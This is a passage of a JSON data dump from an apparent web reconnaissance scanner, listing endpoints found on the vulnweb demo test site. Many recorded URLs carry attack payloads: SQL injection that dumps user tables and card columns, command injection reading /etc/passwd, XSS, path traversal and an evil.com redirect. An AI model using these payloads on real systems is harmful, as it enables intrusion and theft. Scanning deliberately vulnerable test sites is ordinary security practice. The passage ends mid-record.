"model": "startScan.endpoint", + "pk": 969, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml", + "content_length": 143, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:24.911Z", + "response_time": 0.183893741, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 970, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/.idea/vcs.xml", + "content_length": 173, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:25.013Z", + "response_time": 0.185261806, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 972, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/.idea/workspace.xml", + "content_length": 12473, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:25.224Z", + "response_time": 0.200617069, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 989, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/404.php", + "content_length": 5270, + "page_title": "Your requested document was not found!", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:34.281Z", + "response_time": 0.35318944399999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 990, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?%2F", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:34.428Z", + "response_time": 0.343437259, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 991, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?%3Fcmd=exec(%27cat%20%2Fetc%2Fpasswd%27)", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:34.590Z", + "response_time": 0.347884429, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 992, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?%3Fcmd=exec(%27id%27)", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:34.749Z", + "response_time": 0.345964718, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 993, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?%3Fcmd=shell_exec(%27cat%20%2Fetc%2Fissue%27)", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:34.895Z", + "response_time": 0.34116805499999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 994, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?%3Fid=1", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:35.056Z", + "response_time": 0.343736743, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 995, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?%3Fid=1%20--", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:35.189Z", + "response_time": 0.343409605, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 996, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?%3Fid=1%20OR%201=1--", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:35.315Z", + "response_time": 0.352953323, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 997, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?%3Fid=1%27%20AND%201=1--%20AND%20IFNULL(1,2)=2--", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:35.442Z", + "response_time": 0.347698981, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 998, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?%3Fid=1%2F%2A!50000AND%2A%2F1=2", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:35.572Z", + "response_time": 0.354850587, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 999, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?cmd=shell_exec(%27cat%20%2Fetc%2Fissue%27)", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:35.725Z", + "response_time": 0.34947718099999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1000, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?id=1%2F%2A!50000OR%2A%2F1=2", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:35.869Z", + "response_time": 0.344948377, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1001, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?input=%22%20OR%20%221%22=%221%22%3B%20--", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:36.001Z", + "response_time": 0.351978458, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1002, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?input=%22%20UNION%20SELECT%20NULL,%20username,%20password%20FROM%20users%3B%20--", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:36.149Z", + "response_time": 0.343571759, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1003, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?input=%27%20OR%20%271%27=%271%27%3B%20--", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:38.859Z", + "response_time": 0.35741039, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1004, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?input=%27%3B%20DROP%20TABLE%20users%3B%20--", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:38.989Z", + "response_time": 0.34983502600000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1005, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?input=%3Cimg%20src=x%20onerror=alert(1)%3E", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:39.122Z", + "response_time": 0.34941567700000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1006, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?input=%3Cscript%3Ealert(%27XSS%27)%3B%3C%2Fscript%3E", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:39.676Z", + "response_time": 0.351688213, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1007, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?input=..%5C..%5C..%5Cwindows%5Csystem32%5Ccmd.exe", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:39.808Z", + "response_time": 0.34517381399999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1008, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?input=..%2Fetc%2Fpasswd", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:39.936Z", + "response_time": 0.358270759, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1009, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?input=http:%2F%2Fevil.com%2F", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:40.073Z", + "response_time": 0.35327612199999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1010, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?source=post_page-----2c177545f21d--------------------------------", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:40.200Z", + "response_time": 0.345955735, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1011, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?trk=public_post-text", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:40.331Z", + "response_time": 0.343901542, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1012, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/?trk=public_post_main-feed-card-text", + "content_length": 4958, + "page_title": "Home of Acunetix Art", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:40.458Z", + "response_time": 0.350989618, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1020, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/categories.php", + "content_length": 195, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:44.716Z", + "response_time": 0.352920573, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1023, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/index.php", + "content_length": 4236, + "page_title": "ajax test", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:45.007Z", + "response_time": 0.34709175800000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1030, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%287432%3D7432%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29", + "content_length": 148, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:45.684Z", + "response_time": 0.35797998799999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1031, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%209436%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%289436%3D9436%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29", + "content_length": 244, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:45.793Z", + "response_time": 0.340445008, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1032, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%20CONCAT%280x7178706a71%2C%28ELT%289505%3D9505%2C1%29%29%2C0x71706b6a71%29%29", + "content_length": 23, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:45.904Z", + "response_time": 0.346850491, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1038, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1632%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28QUARTER%28NULL%20XOR%20NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-", + "content_length": 74, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:50.311Z", + "response_time": 0.342719715, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1041, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1861%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ctable_name%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x616375617274%29--%20-", + "content_length": 160, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:50.652Z", + "response_time": 0.353413974, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1046, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2332%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Cschema_name%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-", + "content_length": 105, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:53.972Z", + "response_time": 0.352223638, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1048, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-3642%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-", + "content_length": 74, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:54.220Z", + "response_time": 0.340093108, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1049, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-3875%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7744434c51726a566a66644f6c725861684c714b454f50765951736e724f674a684945436f727166%2C0x71706b6a71%29%2CNULL%2CNULL--%20-", + "content_length": 63, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:54.984Z", + "response_time": 0.346875935, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1050, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-4923%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccat_id%2Ccdesc%2Ccname%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20acuart.categ--%20-", + "content_length": 1205, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:55.112Z", + "response_time": 0.35648352899999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1053, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-5496%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-", + "content_length": 74, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:55.452Z", + "response_time": 0.343676711, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1056, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7100%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2C%60name%60%2Caddress%2Ccart%2Ccc%2Cemail%2Cpass%2Cphone%2Cuname%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20acuart.users--%20-", + "content_length": 262, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:55.806Z", + "response_time": 0.355918445, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1057, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7472%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccolumn_name%2Ccolumn_type%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x7573657273%20AND%20table_schema%3D0x616375617274--%20-", + "content_length": 283, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:55.932Z", + "response_time": 0.349003513, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1060, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7852%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccolumn_name%2Ccolumn_type%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x6361746567%20AND%20table_schema%3D0x616375617274--%20-", + "content_length": 141, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:56.299Z", + "response_time": 0.355741133, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1065, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-9119%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x51484b7a724e726a4a4e625a446857716d4968627a456b6f6d595a576178536e4e7247645954556a%2C0x71706b6a71%29%2CNULL--%20-", + "content_length": 113, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:59.822Z", + "response_time": 0.35083030400000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1066, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=-9965%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28SESSION_USER%28%29%20LIKE%20USER%28%29%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-", + "content_length": 74, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:21:00.392Z", + "response_time": 0.357742006, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1068, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=1", + "content_length": 1343, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:21:00.659Z", + "response_time": 0.35012744199999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1118, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20ROW%289777%2C8926%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%289777%3D9777%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203911%20UNION%20SELECT%202804%20UNION%20SELECT%206270%20UNION%20SELECT%206446%29a%20GROUP%20BY%20x%29", + "content_length": 244, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:21:17.514Z", + "response_time": 0.35269304, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1202, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": 